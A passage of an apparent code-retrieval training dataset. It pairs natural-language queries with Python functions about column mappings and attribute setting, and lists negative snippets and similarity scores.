'columns@{cn}'.format(cn=col_name)\n new_col_mapper = 'columns@{ncn}'.format(ncn=new_col_name)\n mapper[col_mapper] = new_col_mapper\n\n return mapper", "def load_columns(self):\n pass", "def get_mappings(embedding):\n n_columns = embedding.shape[1]\n mappings = []\n for i in range(n_columns):\n mappings.append(get_eq_n_intervals(embedding[:, i]))\n return np.array(mappings)", "def getSampleColumnList( platformTarget):\n print(f'columnIndexDict: {columnIndexDict}')\n columnIndex = getColumnIndex(platformTarget, 'Sample')\n print(f' columnIndex:{columnIndex}')\n columnList = []\n for key, val in bltFieldsDict.items():\n columnList.append([key, val[columnIndex]])\n\n return columnList", "def get_columns_after_apply_mapping(self) -> List[str]:\n return self.get_dyf_and_apply_mapping().toDF().columns", "def create_deft_table_json_mappings():\n mappings = list()\n mappings.append(JsonColumnMapping(columnName=\"rownumber\", jsonPath=\"$.rownumber\", cslDataType=\"int\"))\n mappings.append(JsonColumnMapping(columnName=\"rowguid\", jsonPath=\"$.rowguid\", cslDataType=\"string\"))\n mappings.append(JsonColumnMapping(columnName=\"xdouble\", jsonPath=\"$.xdouble\", cslDataType=\"real\"))\n mappings.append(JsonColumnMapping(columnName=\"xfloat\", jsonPath=\"$.xfloat\", cslDataType=\"real\"))\n mappings.append(JsonColumnMapping(columnName=\"xbool\", jsonPath=\"$.xbool\", cslDataType=\"bool\"))\n mappings.append(JsonColumnMapping(columnName=\"xint16\", jsonPath=\"$.xint16\", cslDataType=\"int\"))\n mappings.append(JsonColumnMapping(columnName=\"xint32\", jsonPath=\"$.xint32\", cslDataType=\"int\"))\n mappings.append(JsonColumnMapping(columnName=\"xint64\", jsonPath=\"$.xint64\", cslDataType=\"long\"))\n mappings.append(JsonColumnMapping(columnName=\"xuint8\", jsonPath=\"$.xuint8\", cslDataType=\"long\"))\n mappings.append(JsonColumnMapping(columnName=\"xuint16\", jsonPath=\"$.xuint16\", cslDataType=\"long\"))\n mappings.append(JsonColumnMapping(columnName=\"xuint32\", jsonPath=\"$.xuint32\", cslDataType=\"long\"))\n mappings.append(JsonColumnMapping(columnName=\"xuint64\", jsonPath=\"$.xuint64\", cslDataType=\"long\"))\n mappings.append(JsonColumnMapping(columnName=\"xdate\", jsonPath=\"$.xdate\", cslDataType=\"datetime\"))\n mappings.append(JsonColumnMapping(columnName=\"xsmalltext\", jsonPath=\"$.xsmalltext\", cslDataType=\"string\"))\n mappings.append(JsonColumnMapping(columnName=\"xtext\", jsonPath=\"$.xtext\", cslDataType=\"string\"))\n mappings.append(JsonColumnMapping(columnName=\"xnumberAsText\", jsonPath=\"$.xnumberAsText\", cslDataType=\"string\"))\n mappings.append(JsonColumnMapping(columnName=\"xtime\", jsonPath=\"$.xtime\", cslDataType=\"timespan\"))\n mappings.append(\n JsonColumnMapping(columnName=\"xtextWithNulls\", jsonPath=\"$.xtextWithNulls\", cslDataType=\"string\")\n )\n mappings.append(\n JsonColumnMapping(columnName=\"xdynamicWithNulls\", jsonPath=\"$.xdynamicWithNulls\", cslDataType=\"dynamic\")\n )\n return mappings", "def map(self, **names_to_funcs):\n def _mapped_col(name, col):\n if name in names_to_funcs:\n return Column(imap(names_to_funcs[name], col))\n return col\n\n return Document((name, _mapped_col(name, col)) for name, col in self)", "def itermappings(self):\n return six.iteritems(self.by_target)", "def _get_columns(self):\n columns = []\n for column in self.plate_meta['columns']:\n columns.append(column['name'])\n self.columns = columns", "def _retrieve_db_columns():\n\n # Grab the default columns and their details\n hard_coded_columns = copy.deepcopy(VIEW_COLUMNS_PROPERTY)\n\n md = MappingData()\n for c in hard_coded_columns:\n if not md.find_column(c['table'], c['name']):\n print \"Could not find column field in database for {}\".format(c)\n\n return hard_coded_columns", "def templateMappings(self):\n raise NotImplementedError", "def dest_columns(self):\n return self.intersection + self.dest_renames", "def read_mappings(\n cls, mapping_file: Union[str, DataFrame], threshold: float = 0.0\n ) -> List[str]:\n if type(mapping_file) is DataFrame:\n _df = mapping_file\n else:\n _df = pd.read_csv(mapping_file, sep=\"\\t\", na_values=cls.na_vals, keep_default_na=False)\n mappings = [\n \"\\t\".join(_df.iloc[i][:-1]) for i in range(len(_df)) if _df.iloc[i][-1] >= threshold\n ]\n return uniqify(mappings)", "def init_map(data, key_col, data_col, blacklist=None):\n if blacklist:\n return dict([(item[key_col], item[data_col]) \n for item in data if not item[0] in blacklist])\n else:\n return dict([(item[key_col], item[data_col]) for item in data])", "def _columns_are_mapped(self, *cols: ColumnElement[Any]) -> bool:\n\n secondary = self._init_args.secondary.resolved\n for c in cols:\n if secondary is not None and secondary.c.contains_column(c):\n continue\n if not self.parent.persist_selectable.c.contains_column(\n c\n ) and not self.target.c.contains_column(c):\n return False\n return True", "def map_items(self) -> None:\n self.__attribute_columns = list(self.__DataFrame.columns)\n self.__attribute_columns.remove(self.__surv_col_name)\n self.__attribute_columns.remove(self.__status_col_name)\n\n mapped_int = 0\n\n for attribute in self.__attribute_columns:\n for value in self.__DataFrame[attribute].unique():\n item_reference = (attribute, value)\n self.__item_map[item_reference] = mapped_int\n self.items_list.append(item_reference)\n mapped_int += 1", "def test_instantiation_with_column_class(self):\r\n column = columns.Map(columns.Text, columns.Integer)\r\n assert isinstance(column.key_col, columns.Text)\r\n assert isinstance(column.value_col, columns.Integer)", "def _get_categorized_columns(tableColumns):\n columns = {}\n columns_ref = {}\n columns_pri = {}\n columns_ignore = {}\n first_pk_col = None\n\n for col_name, col_attrs in tableColumns.iteritems():\n if RuleHandler.STR_SKIP in col_attrs:\n columns_ignore[col_name] = col_attrs\n elif col_attrs['isPk']:\n if first_pk_col is None:\n first_pk_col = col_name\n columns_pri[first_pk_col] = col_attrs\n else:\n col_attrs['isPk'] = False\n columns[col_name] = col_attrs\n\n if first_pk_col in columns_pri:\n columns_pri[first_pk_col]['isPk'] = False\n columns[first_pk_col] = columns_pri[first_pk_col]\n del columns_pri[first_pk_col]\n\n if 'pkC' not in columns_pri:\n columns_pri['pkC'] = copy.copy(col_attrs)\n columns_pri['pkC']['isPkC'] = list([first_pk_col])\n\n columns_pri['pkC']['isPkC'].append(col_name)\n elif col_attrs['reference']:\n columns_ref[col_name] = col_attrs\n else:\n columns[col_name] = col_attrs\n\n return columns_pri, columns_ref, columns, columns_ignore", "def item_col(self):\n if not self.col_name_mapping:\n return []\n item_sparse, item_dense = [], []\n if \"item_sparse_col\" in self.col_name_mapping:\n item_sparse = list(self.col_name_mapping[\"item_sparse_col\"].keys())\n if \"item_dense_col\" in self.col_name_mapping:\n item_dense = list(self.col_name_mapping[\"item_dense_col\"].keys())\n # The result columns will be sorted by key\n return item_sparse + item_dense", "def _get_columns(model):\n return {c.key: c for c in _get_mapper(model).iterate_properties\n if isinstance(c, ColumnProperty)}", "def items(self):\r\n for column in self.table.columns:\r\n yield (column, self[column.name])", "def _column_fields_to_columns(fields, organization):\n\n def select_col_obj(column_name, table_name, organization_column):\n if organization_column:\n return [organization_column]\n else:\n # Try for \"global\" column definitions, e.g. BEDES. - Note the BEDES are not\n # loaded into the database as of 9/8/2016 so not sure if this code is ever\n # exercised\n obj = Column.objects.filter(organization=None, column_name=column_name).first()\n\n if obj:\n # create organization mapped column\n obj.pk = None\n obj.id = None\n obj.organization = organization\n obj.save()\n\n return [obj]\n else:\n if table_name:\n obj, _ = Column.objects.get_or_create(\n organization=organization,\n column_name=column_name,\n table_name=table_name,\n is_extra_data=is_extra_data,\n )\n return [obj]\n else:\n obj, _ = Column.objects.get_or_create(\n organization=organization,\n column_name=column_name,\n is_extra_data=is_extra_data,\n )\n return [obj]\n\n md = MappingData()\n\n # Container to store the dicts with the Column object\n new_data = []\n\n for field in fields:\n new_field = field\n\n # find the mapping data column (i.e. the database fields) that match, if it exists\n # then set the extra data flag to true\n db_field = md.find_column(field['to_table_name'], field['to_field'])\n is_extra_data = False if db_field else True # yes i am a db column, thus I am not extra_data\n\n try:\n to_org_col, _ = Column.objects.get_or_create(\n organization=organization,\n column_name=field['to_field'],\n table_name=field['to_table_name'],\n is_extra_data=is_extra_data\n )\n except Column.MultipleObjectsReturned:\n _log.debug(\"More than one to_column found for {}.{}\".format(field['to_table_name'],\n field['to_field']))\n # raise Exception(\"Cannot handle more than one to_column returned for {}.{}\".format(\n # field['to_field'], field['to_table_name']))\n\n # TODO: write something to remove the duplicate columns\n to_org_col = Column.objects.filter(organization=organization,\n column_name=field['to_field'],\n table_name=field['to_table_name'],\n is_extra_data=is_extra_data).first()\n _log.debug(\"Grabbing the first to_column\")\n\n try:\n # the from column is the field in the import file, thus the table_name needs to be\n # blank. Eventually need to handle passing in import_file_id\n from_org_col, _ = Column.objects.get_or_create(\n organization=organization,\n table_name__in=[None, ''],\n column_name=field['from_field'],\n units_pint=field.get('from_units'), # might be None\n is_extra_data=False # data from header rows in the files are NEVER extra data\n )\n except Column.MultipleObjectsReturned:\n _log.debug(\n \"More than one from_column found for {}.{}\".format(field['to_table_name'],\n field['to_field']))\n\n # TODO: write something to remove the duplicate columns\n from_org_col = Column.objects.filter(organization=organization,\n table_name__in=[None, ''],\n column_name=field['from_field'],\n units_pint=field.get('from_units'), # might be None\n is_extra_data=is_extra_data).first()\n _log.debug(\"Grabbing the first from_column\")\n\n new_field['to_column_object'] = select_col_obj(field['to_field'],\n field['to_table_name'], to_org_col)\n new_field['from_column_object'] = select_col_obj(field['from_field'], \"\", from_org_col)\n new_data.append(new_field)\n\n return new_data", "def __init__(self, mappings):\n self.mappings = mappings", "def _map_columns_step(self, op: data_algebra.data_ops_types.OperatorPlatform, *, data_map: Dict[str, Any]):\n if op.node_name != \"MapColumnsNode\":\n raise TypeError(\n \"op was supposed to be a data_algebra.data_ops.MapColumnsNode\"\n )\n res = self._compose_polars_ops(op.sources[0], data_map=data_map)\n if isinstance(res, pl.LazyFrame):\n # work around https://github.com/pola-rs/polars/issues/5882#issue-1507040380\n res = res.collect()\n res = res.rename(op.column_remapping)\n res = res.select(op.columns_produced())\n if self.use_lazy_eval and isinstance(res, pl.DataFrame):\n res = res.lazy()\n return res", "def get_column_mappings_by_table_name(organization):\n\n data, _ = ColumnMapping.get_column_mappings(organization)\n # data will be in format\n # {\n # u'Wookiee': (u'PropertyState', u'Dothraki'),\n # u'Ewok': (u'TaxLotState', u'Hattin'),\n # u'eui': (u'PropertyState', u'site_eui'),\n # u'address': (u'TaxLotState', u'address')\n # }\n\n tables = set()\n for k, v in data.iteritems():\n tables.add(v[0])\n\n # initialize the new container to store the results\n # (there has to be a better way of doing this... not enough time)\n container = {}\n for t in tables:\n container[t] = {}\n\n for k, v in data.iteritems():\n container[v[0]][k] = v\n\n # Container will be in the format:\n #\n # container = {\n # u'PropertyState': {\n # u'Wookiee': (u'PropertyState', u'Dothraki'),\n # u'eui': (u'PropertyState', u'site_eui'),\n # },\n # u'TaxLotState': {\n # u'address': (u'TaxLotState', u'address'),\n # u'Ewok': (u'TaxLotState', u'Hattin'),\n # }\n # }\n return container", "def createMappedTableColumn(self, destinationColumn: docking.widgets.table.DynamicTableColumn) -> docking.widgets.table.DynamicTableColumn:\n ...", "def columns(self):\n columns = self.query.get_columns()\n # Adjust any column names which don't match field names\n for query_name, model_name in self.translations.items():\n # Ignore translations for nonexistent column names\n try:\n index = columns.index(query_name)\n except ValueError:\n pass\n else:\n columns[index] = model_name\n return columns", "def getMappingSuggestions(self,dataSetId:str=None,batchId:str=None,excludeUnmapped:bool=True)->dict:\n path = \"/mappingSets/suggestion\"\n params = {\"excludeUnmapped\":excludeUnmapped}\n if dataSetId is not None:\n params['datasetId'] = dataSetId\n if batchId is not None:\n params[\"batchId\"] = batchId\n res = self.connector.getData(self.endpoint+path,params=params)\n return res", "def columns(self):\n return NotImplemented", "def map_column_indexes(self, merge_specification, ingredients):\n last_column = len(ingredients) - 1\n accumulating = {}\n remove = set()\n # default behavior, no column merge\n for column_index in range(0, last_column + 1):\n self.column_index_to_columns[column_index] \\\n = [(column_index, 1.0)]\n \n for columns in merge_specification:\n accumulating_column = columns[0][0]\n if accumulating_column > last_column or accumulating_column < 0:\n raise MergeConfigError(\n \"Attempted to merge missing column %d\" % accumulating_column)\n # specifies which columns should be merged into this one\n accumulating[accumulating_column] = columns\n for column_index, _ in columns[1:]:\n column_index = column_index\n if column_index > last_column or column_index < 0:\n raise MergeConfigError(\n \"Attempted to merge missing column %d\" % column_index) \n # drop this column; it will be merged into another\n remove.add(column_index)\n \n # drop columns first so that any columns both specified as\n # accumulating *and* merged columns do not get dropped\n for column_index in remove:\n self.column_index_to_columns[column_index] = None\n \n for column_index, columns in accumulating.items():\n self.column_index_to_columns[column_index] = columns", "def mappings(self, year=None):\n raise NotImplementedError()", "def map_factory(cls, list_to_alter):\n temp_list = []\n for letter in list_to_alter:\n # Only cell types which are allowed can be transformed\n if letter not in cls.dict_cells.keys():\n raise ValueError(f\"{letter} is not an allowed cell type\")\n temp_list.append(cls.dict_cells[letter]())\n\n return temp_list", "def rename_map_for_dframe(self, dframe):\n labels_to_slugs = self.labels_to_slugs\n\n return {\n column: labels_to_slugs[column] for column in\n dframe.columns.tolist() if self._resluggable_column(\n column, labels_to_slugs, dframe)\n }", "def get_mapping():\n \n import pandas as pd\n data = pd.read_csv('/home/yuheng/Downloads/ADE20K_2016_07_26/objectInfo150.txt',sep='\\t',lineterminator='\\n') \n mapping = {}\n for i in range(150):\n line = data.loc[i]\n mapping[ int(line['Idx']) ] = line['Name']\n \n return mapping", "def init_mapping_field_list(\n name_columen: list,\n xdm_one_data_model: list,\n raw_event: dict,\n xdm_rule_to_dtype: dict,\n xdm_rule_to_dclass: dict,\n) -> List[MappingField]:\n mapping_list = []\n xdm_onedata_model_names = xdm_rule_to_dclass.keys()\n for (field_name, xdm_field_name) in zip(name_columen, xdm_one_data_model):\n raw_event_data_list: List[RawEventData] = handle_raw_evnet_data(\n field_name, raw_event\n )\n\n if xdm_field_name not in xdm_onedata_model_names:\n if not xdm_field_name:\n logger.warning(f\"No xdm rule was specified for {field_name}\")\n else:\n raise ValueError(\n f\"No XDM field {xdm_field_name} exists in the onedata model. Please check your modelling rules file.\"\n )\n\n xdm_field_type = xdm_rule_to_dtype.get(xdm_field_name)\n xdm_class_type = xdm_rule_to_dclass.get(xdm_field_name)\n\n mapping_list.append(\n MappingField(\n xdm_rule=xdm_field_name,\n xdm_field_type=xdm_field_type,\n xdm_class_type=xdm_class_type,\n mapped_to_raw=raw_event_data_list,\n )\n )\n\n return mapping_list", "def get_matching_columns(self, columns):\n result = []\n for column in columns:\n if self.match(column):\n result.append(column)\n return result", "def build_rename_mapper_from_df(df, chunk_name_mapper):\n rename_mapper = {}\n for column_name_chunk in chunk_name_mapper:\n for c in df.columns:\n if column_name_chunk in c:\n rename_mapper[c] = c.replace(\n column_name_chunk, chunk_name_mapper[column_name_chunk]\n )\n return rename_mapper", "def test_instantiation_with_column_instance(self):\r\n column = columns.Map(columns.Text(min_length=100), columns.Integer())\r\n assert isinstance(column.key_col, columns.Text)\r\n assert isinstance(column.value_col, columns.Integer)", "def get_columns(self, request, cl):\n columns = []\n for field_name in cl.model_admin.list_display:\n text, _ = label_for_field(field_name, cl.model, model_admin=cl.model_admin, return_attr=True)\n columns.append({field_name: text})\n return columns", "def map_def_classes(self, table):\n definition = MapperDefinition()\n for rc in self.get_table_classes(table):\n splitted = rc.split()\n abbreviation = \" \".join(splitted[:-1])\n course_number = splitted[-1]\n definition.add(abbreviation, allowed=[course_number])\n return definition", "def get_mention_id_mappings(input_file_name, out_file, field_threshold, column_indices):\n out = open(out_file, 'w')\n if input_file_name.endswith('.csv'):\n with open(input_file_name, 'r') as f:\n reader = csv.reader(f)\n for line in reader:\n if len(line) >= field_threshold:\n if not line[0].startswith(\"#\"):\n row = []\n for index in column_indices:\n row.append(line[index])\n out.write(\"|\".join(row) + \"\\n\")\n out.close()", "def branch_mappings(self):\n return self._return_if('_branch_mappings')", "def columns(self):\n return self.__column_list", "def make_columns(options, columns):\n # (ElasticsearchFDWOptions, Dict[str, multicorn.ColumnDefinition]) -> Columns\n columns = columns.copy()\n\n id_column = IdColumn(name=options.rowid_column)\n columns.pop(options.rowid_column, None)\n if options.score_column:\n score_column = ScoreColumn(name=options.score_column)\n del columns[options.score_column]\n else:\n score_column = None\n if options.query_column:\n query_column = options.query_column\n del columns[options.query_column]\n else:\n query_column = None\n if options.sort_column:\n sort_column = options.sort_column\n del columns[options.sort_column]\n else:\n sort_column = None\n\n columns = [make_column(options, name, column) for name, column in columns.items()]\n return Columns(\n id_column=id_column,\n score_column=score_column,\n query_column=query_column,\n sort_column=sort_column,\n columns=columns,\n )", "def _columns(cls, schema: dsl.Source.Schema) -> typing.Sequence[str]:\n return tuple(f.name for f in schema)", "def GetColumns(self):\n ret = super().GetColumns()\n ret.append((\"name\",\"text\"))\n return ret", "def mapping_description(self):\n\n mapping_description_lines = []\n\n if self.valuemap:\n for value in sorted(self.valuemap.keys()):\n mapping = self.valuemap[value]\n mapping_description_lines.append(\"'{}' <-> '{}'\\n\".format(value, mapping))\n return mapping_description_lines", "def column_reflection_fallback(self):\n col_info_dict_list: List[Dict]\n if self.sql_engine_dialect.name.lower() == \"mssql\":\n type_module = self._get_dialect_type_module()\n # Get column names and types from the database\n # StackOverflow to the rescue: https://stackoverflow.com/a/38634368\n col_info_query: TextClause = sa.text(\n f\"\"\"\nSELECT\n cols.NAME, ty.NAME\nFROM\n tempdb.sys.columns AS cols\nJOIN\n sys.types AS ty\nON\n cols.user_type_id = ty.user_type_id\nWHERE\n object_id = OBJECT_ID('tempdb..{self._table}')\n \"\"\"\n )\n col_info_tuples_list = self.engine.execute(col_info_query).fetchall()\n col_info_dict_list = [\n {\"name\": col_name, \"type\": getattr(type_module, col_type.upper())()}\n for col_name, col_type in col_info_tuples_list\n ]\n else:\n query: Select = sa.select([sa.text(\"*\")]).select_from(self._table).limit(1)\n col_names: list = self.engine.execute(query).keys()\n col_info_dict_list = [{\"name\": col_name} for col_name in col_names]\n return col_info_dict_list", "def replace_legend_value_mappings(legends, documentation):\r\n col_documentation = documentation.get_column(legends[0])\r\n dtype = col_documentation.column_type\r\n return [col_documentation.description] + \\\r\n [col_documentation.values_mapping[dtype(l)] for l in legends[1:]]", "def get_overrides_columns(self):\n\n if hasattr(self, '_overrides'):\n return list(self._overrides.columns)\n return []", "def list_column(self,\n column_name: str,\n start: int = None,\n end: int = None) -> List:\n return [getattr(i, column_name) for i in self.data[start:end]]", "def _transform_map_data(self):\n WARD_FMT = '%s-%s'\n self.map_data_trans = []\n lookup = {i.column: ''.join(filter(lambda x: x.isdigit(), i.value)) for i in self.sht[1]}\n\n #skip over header\n rs = iter(self.sht.rows)\n next(rs)\n next(rs)\n for r in rs:\n pka = r[0].value\n for c in r[1:]:\n if c.value is None:\n c.value = 0\n\n self.map_data_trans.append((WARD_FMT%(pka, lookup[c.column]), c.value))", "def columns(cls):\n return { col.key: { 'python_type': col.type.python_type,\n 'type': str(col.type),\n 'primary_key': col.primary_key,\n 'default': col.default,\n 'nullable': col.nullable}\n for col in cls.__table__.columns }", "def get_column_class_names(self, classes_set, bound_column):\n cset = super(ColumnShiftTable, self).get_column_class_names(classes_set, bound_column)\n cset.add(bound_column.name)\n return cset", "def undimensionizing_mapper(self, names=None):\n\n masks = self._meta['masks']\n columns = self._meta['columns']\n\n mask_pattern = '(^.+)\\..+$'\n column_pattern = '(?<=\\[{)(.*?)(?=}\\])'\n\n mapper = {}\n if not names:\n names = list(masks.keys()) + list(columns.keys())\n for mask_name in list(masks.keys()):\n if mask_name in names:\n matches = re.findall(mask_pattern, mask_name)\n if matches:\n new_mask_name = matches[0]\n mapper[mask_name] = new_mask_name\n\n mask_mapper = 'masks@{mn}'.format(mn=mask_name)\n new_mask_mapper = 'masks@{nmn}'.format(nmn=new_mask_name)\n mapper[mask_mapper] = new_mask_mapper\n\n values_mapper = 'lib@values@{mn}'.format(mn=mask_name)\n new_values_mapper = 'lib@values@{nmn}'.format(nmn=new_mask_name)\n mapper[values_mapper] = new_values_mapper\n\n for col_name in list(columns.keys()):\n if col_name in names:\n matches = re.findall(column_pattern, col_name)\n if matches:\n new_col_name = matches[0]\n mapper[col_name] = new_col_name\n col_mapper = 'columns@{mn}'.format(mn=col_name)\n new_col_mapper = 'columns@{nmn}'.format(nmn=new_col_name)\n mapper[col_mapper] = new_col_mapper\n return mapper", "def get_categorical_columns() -> list:\n return [\n \"National Provider Identifier\",\n \"Last Name/Organization Name of the Provider\",\n \"First Name of the Provider\",\n \"Middle Initial of the Provider\",\n \"Credentials of the Provider\",\n \"Gender of the Provider\",\n \"Entity Type of the Provider\",\n \"Street Address 1 of the Provider\",\n \"Street Address 2 of the Provider\",\n \"City of the Provider\",\n \"Zip Code of the Provider\",\n \"State Code of the Provider\",\n \"Country Code of the Provider\",\n \"Provider Type\",\n \"Medicare Participation Indicator\",\n \"Place of Service\",\n \"HCPCS Code\",\n \"HCPCS Description\",\n \"HCPCS Drug Indicator\"\n ]", "def generate_suggestions(self):\n\n track_table = tasks.get_kdbg(self.obj_vm).PoolTrackTable\n\n for pair in self.distance:\n table_base = obj.Object(\"address\", \n offset = track_table - pair[0], \n vm = self.obj_vm)\n\n table_size = obj.Object(\"address\", \n offset = track_table - pair[1], \n vm = self.obj_vm)\n\n if table_size != 0 and self.obj_vm.is_valid_address(table_base):\n break\n\n debug.debug(\"Distance Map: {0}\".format(repr(self.distance)))\n debug.debug(\"PoolTrackTable: {0:#x}\".format(track_table))\n debug.debug(\"PoolBigPageTable: {0:#x} => {1:#x}\".format(table_base.obj_offset, table_base))\n debug.debug(\"PoolBigPageTableSize: {0:#x} => {1:#x}\".format(table_size.obj_offset, table_size))\n yield table_base, table_size", "def get_forward_mapping(self):", "def resolve_from_mappings(mol_list, ligand_mapping, inchi_mapping,\n chebi_mapping):\n new_mapping = {}\n for mol in mol_list: \n smiles = get_smiles_from_mappings(mol, ligand_mapping,\n inchi_mapping, chebi_mapping)\n if smiles:\n new_mapping[mol] = smiles\n return new_mapping", "def columns(self):\n\n return None", "def mapping_names(self):\n return sorted([self.basename] + [name for selector in self.selections.normal_values() for name in selector.mapping_names()])", "def collect_columns():\n return ((x, y) for x in range(72) for y in range(x + 9, 81, 9))", "def get_target_column(self, source, column):\n # Refactor as never called without column\n tbl_col = source + '.' + column\n mapping = self.mapping.get(tbl_col, None)\n # not found? We look for wildcards\n if mapping is None:\n # wildcard, we match the source\n\n # partial wildcard, we match only for the table\n partial_pattern = '%s.*' % source\n if partial_pattern in self.mapping:\n if self.mapping[partial_pattern]:\n # In this function we replace the star with the sought\n # column if autoforget is not enabled, or it is present\n # in the target table\n # if column not in self.explicit_columns.get(source, [column]):\n # LOG.warn('Source table %s contains column %s that '\n # 'isn\\'t present in target', (source, column))\n return {k.replace('*', column): v\n for k, v in self.mapping[partial_pattern].items()\n if column in self.explicit_columns.get(source, [column])}\n return {tbl_col: None}\n elif '.*' in self.mapping:\n return {tbl_col: None}\n return mapping", "def all_colormaps():\n maps = [name\n for name in cm.datad.keys()\n if not name.endswith(\"_r\")]\n maps.sort()\n return maps", "def _emphasized_columns(self) -> Iterable[int]:\n return range(self._PRIMARY)", "def base_columns(self):\r\n _base_columns = set(self.all_columns).intersection(set(self.reqd_columns))\r\n return list(_base_columns)", "def get_mapping(cls):\n return {\n \"mappings\": {\n cls.get_mapping_type_name(): {\n \"properties\": {\n 'id': {'type': 'string'},\n 'text': {'type': 'string', 'analyzer': 'snowball'},\n }\n }\n }\n }", "def get_table_columns(self):\n raise NotImplementedError(\"Please implement this method\")", "def cell_map_from_database(self) -> None:\n for row in self.session.query(DatamapItem).all():\n self.cell_map.append(\n Cell(\n datamap_id=row.id,\n cell_key=row.key,\n cell_value=None,\n template_sheet=row.bicc_sheet,\n bg_colour=None,\n fg_colour=None,\n number_format=None,\n verification_list=None,\n cell_reference=row.bicc_cellref))", "def __iter__(self):\r\n for column_id in self._columns.keys():\r\n yield column_id", "def columns(self):\n return self._coldefs", "def _get_cell_map(row: TRowResult) -> Dict[bytes, TCell]:\n if row.sortedColumns is not None:\n return {c.columnName: c.cell for c in row.sortedColumns}\n elif row.columns is not None:\n return row.columns\n else: # pragma: no cover\n raise RuntimeError(\"Neither columns nor sortedColumns is available!\")", "def mapped(self):\n return self.__mapped", "def map_column_to_index(self, col):\n if col in self.column_maps:\n return\n\n # First construct the map from original ids to new ones.\n ids = pd.concat((self.train[col], self.test[col])).unique()\n n = len(ids)\n idmap = dict(itertools.izip(ids, xrange(n)))\n\n # Next use the map to convert the ids in-place.\n self.train.loc[:, col] = self.train[col].apply(lambda _id: idmap[_id])\n self.test.loc[:, col] = self.test[col].apply(lambda _id: idmap[_id])\n\n # Now swap key for value in the idmap to provide a way to convert back.\n reverse_map = {val: key for key, val in idmap.iteritems()}\n self.column_maps[col] = reverse_map", "def origin_columns(self):\n return self.intersection + self.origin_renames", "def collate_fn(self, image_column_names: Optional[List] = None, per_gpu_batch_size: Optional[int] = None) -> Dict:\n fn = {}\n if self.requires_column_info:\n return NotImplementedError(\n f\"requires_column_info={self.requires_column_info} not implemented for OVD tasks.\"\n )\n\n fn.update(\n {\n self.image_key: PadCollator(pad_val=0),\n self.prompt_key: ListCollator(),\n self.image_meta_key: ListCollator(),\n }\n )\n return fn", "def _build_columns_struct(self):\n struct = []\n for column in self.columns:\n struct.append({\n \"id\": column.id,\n \"label\": column.label,\n \"pattern\": \"\",\n \"type\": column.type,\n \"p\": column.p}\n )\n return struct", "def mapping(self):\n return self._mapping" ]
[ "0.6701818", "0.66194874", "0.64661616", "0.6289916", "0.62860745", "0.6266867", "0.6198274", "0.6167986", "0.6022413", "0.5931042", "0.5810462", "0.5776295", "0.5758414", "0.5749279", "0.57203007", "0.5662926", "0.5634716", "0.5623659", "0.55996656", "0.5535574", "0.5528489", "0.5524142", "0.55064124", "0.54999566", "0.5457086", "0.54557407", "0.54533345", "0.54453033", "0.54366136", "0.5431268", "0.5430224", "0.54080945", "0.5406593", "0.5392162", "0.53589", "0.53352743", "0.53271204", "0.5327032", "0.5326628", "0.53205055", "0.53014666", "0.5300968", "0.5286402", "0.5286227", "0.525618", "0.5244019", "0.524389", "0.5238036", "0.52271867", "0.52123004", "0.5205679", "0.5187118", "0.5181948", "0.51731163", "0.51719445", "0.5154889", "0.5153462", "0.5153157", "0.5135123", "0.51294094", "0.5124877", "0.5123227", "0.5121135", "0.51196283", "0.5114464", "0.51101017", "0.51079005", "0.5099668", "0.50835365", "0.50808215", "0.50754464", "0.5070447", "0.50620794", "0.5061077", "0.50599414", "0.505792", "0.50469995", "0.5034634", "0.5027022", "0.5008776", "0.5006505", "0.5003667", "0.5001076", "0.49985954", "0.49963453", "0.49869534", "0.49856433", "0.49808922", "0.49775285", "0.49766093", "0.4975227", "0.4972777", "0.49681103", "0.49655855", "0.49497035", "0.49416897", "0.4938525", "0.49326405", "0.49244386", "0.4918949" ]
0.63081527
3
Set any attributes that are passed in as initial data.
def apply_initial_data(model, initial_data): for item in initial_data: value = initial_data[item] if hasattr(model, item): setattr(model, item, value) elif hasattr(model, 'extra_data') and isinstance(model.extra_data, dict): model.extra_data[item] = value return model
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def _set_attributes(self):", "def __init__(self, **initial_attributes):\n\n for attribute_name, attribute_value in initial_attributes.items():\n setattr(self, attribute_name, attribute_value)", "def init_attrs(self):\n raise NotImplementedError", "def __init__(self, **attributes):\n self.set(**attributes)", "def init_attributes(self):\n # Set default values\n for key, value in self.defaults.items():\n setattr(self, key, value)\n\n # Parse all arguments in kwargs\n for key, value in self.kwargs.items():\n parsed_value = eval_arg(value, key)\n logging.info('Setting ' + str(type(parsed_value)) + ' self.' + str(key) + ' = ' + str(parsed_value))\n setattr(self, key, parsed_value)\n\n # self.today = date_utils.get_datetime_from_timezone(self.date_offset, self.timezone)\n self.today = datetime.datetime.today()", "def __init__(self, **attributes):\n for key, value in attributes.items():\n setattr(self, key, value)", "def set_attributes(self, attributes):\n self.attributes = dict(attributes) # overwrite the existing registry of attributes with the input attributes", "def set_attributes(self, attributes):\n self.attributes = dict(attributes) # overwrite the existing registry of attributes with the input attributes", "def set_attributes(self, attributes):\n self.attributes = dict(attributes) # overwrite the existing registry of attributes with the input attributes", "def set_attributes(self, attributes):\n self.attributes = attributes", "def set_attrs(self, username, attrs):\n pass", "def __init__(self, attrs = None):\n\n if attrs != None:\n self.__dict__.update(attrs)", "def _set_attr(self):\n self.as_skeletal = self._import_as_skeleton()\n self.materials = self._import_materials()\n self.textures = self._import_textures()", "def __init__(self, **attrs):\n \n # set given attributes\n for name, value in attrs.items():\n if hasattr(self, name):\n setattr(self, name, value)\n else:\n raise AttributeError(\"Attribute not found! --> %s\" % name)", "def test_attributes_set_from_passed_values(self):\n\n expected_attributes = {\n \"columns\": [\"a\", \"b\", \"c\"],\n \"copy\": False,\n \"verbose\": True,\n }\n\n x = BaseTransformer(**expected_attributes)\n\n h.test_object_attributes(\n obj=x,\n expected_attributes=expected_attributes,\n msg=\"Attributes set in init from passed values\",\n )", "def setup(self, **kwargs):\n\n for k, v in kwargs.items():\n setattr(self, k, v)", "def prepare_node_attrs(self):", "def updateAttrs(self, kwargs):\n for k, v in kwargs.iteritems():\n setattr(self, k, v)", "def _init_attributes(self):\n self.attr = {\n 'name': None,\n 'tags': [],\n 'openHours': None,\n 'type': None,\n 'parent': None,\n 'locationId': None,\n 'bannerAbbreviation': None,\n 'arcGisAbbreviation': None,\n 'geoLocation': None,\n 'geometry': None,\n 'summary': None,\n 'description': None,\n 'descriptionHtml': None,\n 'address': None,\n 'city': None,\n 'state': None,\n 'zip': None,\n 'county': None,\n 'telephone': None,\n 'fax': None,\n 'thumbnails': 